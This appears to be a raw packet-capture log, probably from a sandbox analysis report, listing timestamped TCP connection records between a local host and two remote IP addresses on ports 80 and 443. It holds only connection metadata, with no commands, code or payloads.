                                                                                                                                                                          Nov 23, 2024 19:01:38.679580927 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.679589033 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.696533918 CET4434974213.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.696692944 CET4434974213.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.696919918 CET49742443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:38.697206020 CET49742443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:38.697236061 CET4434974213.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.697262049 CET49742443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:38.697273016 CET4434974213.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.700949907 CET49747443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:38.700988054 CET4434974713.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.701306105 CET49747443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:38.701493025 CET49747443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:38.701504946 CET4434974713.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.707623959 CET4434974313.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.707778931 CET4434974313.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.707894087 CET49743443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:38.707947969 CET49743443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:38.707962990 CET4434974313.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.707979918 CET49743443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:38.707983971 CET4434974313.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.710948944 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.711154938 CET49748443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:38.711182117 CET4434974813.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.711236954 CET49748443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:38.711620092 CET49748443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:38.711631060 CET4434974813.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.784564972 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.784662962 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.784707069 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.784930944 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.784989119 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.785033941 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.786031008 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.786093950 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.786276102 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.786962032 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.787070036 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.787121058 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.787986994 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.788084984 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.788131952 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.789045095 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.789170027 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.789320946 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.790023088 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.790129900 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.790165901 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.791039944 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.791167021 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.791207075 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.792002916 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.792161942 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.792915106 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.793051004 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.793066978 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.794058084 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.794100046 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.794277906 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.794831038 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.795052052 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.795166969 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.795567989 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.796061039 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.796189070 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.796274900 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.797065020 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.797164917 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.797207117 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.798098087 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.798213005 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.798259020 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.799137115 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.799254894 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.799432039 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.800117016 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.800224066 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.800268888 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.801131964 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.801223040 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.801271915 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.802162886 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.802287102 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.802323103 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.803170919 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.803244114 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.803287029 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.804192066 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.804313898 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.804908991 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.805196047 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.805285931 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.806205988 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.806248903 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.806344032 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.806902885 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.807210922 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.807725906 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.807775974 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.808235884 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.808315992 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.808362007 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.853987932 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.854151964 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.854356050 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.854408979 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.854551077 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.855418921 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.855540037 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.855608940 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.856422901 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.856558084 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.856905937 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.857456923 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.857650995 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.857700109 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.858419895 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.858539104 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.858582973 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.859427929 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.859563112 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.859750986 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.860496998 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.860640049 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.860766888 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.861465931 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.861543894 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.861587048 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.862593889 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.862750053 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.862801075 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.863715887 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.863827944 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.863874912 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.864650011 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.864806890 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.864851952 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.865523100 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.865644932 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.865731001 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.866519928 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.866662979 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.867583036 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.867628098 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.867687941 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.868554115 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.868660927 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.868710995 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.869633913 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.869669914 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.869719982 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.870593071 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.870727062 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.870771885 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.871624947 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.871736050 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.871789932 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.872601032 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.872725964 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.872817039 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.873658895 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.873748064 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.873796940 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.874636889 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.874752045 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.874890089 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.875657082 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.875783920 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.875827074 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.876660109 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.876714945 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.876764059 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.877716064 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.877932072 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.878076077 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.878807068 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.878887892 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.878932953 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.879738092 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.879934072 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.880103111 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.880722046 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.880834103 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.880881071 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.881736994 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.881864071 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.882746935 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.882797003 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.882828951 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.883793116 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.883883953 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.883924961 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.884772062 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.884924889 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.884969950 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.885777950 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.885893106 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.885931969 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.886801958 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.887029886 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.887228966 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.887830019 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.887978077 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.888076067 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.888855934 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.888994932 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.889131069 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.889825106 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.889945984 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.890089035 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.890861988 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.890966892 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.891012907 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.891871929 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.891978979 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.892038107 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.892870903 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.892997026 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.893094063 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.893894911 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.893991947 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.894054890 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.894944906 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.895035982 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.895101070 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.896027088 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.896226883 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.896307945 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.897005081 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.897064924 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.897104979 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.898017883 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.898142099 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.898269892 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.898962021 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.899089098 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.899149895 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.900048018 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.900281906 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.900346041 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.901057005 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.901191950 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.901259899 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.902013063 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.902127028 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.902321100 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.903002977 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.903115034 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.903167963 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.904041052 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.904160976 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.904222965 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.905025005 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.905153990 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.906157017 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.906217098 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.906243086 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.907027960 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:38.908920050 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:38.942539930 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.063338995 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.063460112 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.063476086 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.063515902 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.063606977 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.063622952 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.063638926 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.063646078 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.063673019 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.064349890 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.064367056 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.064436913 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.064476013 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.065363884 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.065383911 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.065402031 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.065428972 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.065450907 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.066310883 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.066328049 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.066344023 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.066364050 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.067076921 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.067092896 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.067107916 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.067121029 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.067150116 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.067837000 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.067853928 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.067899942 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:39.067977905 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.068873882 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.068892956 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:39.068907976 CET8049738185.215.113.16192.168.2.5
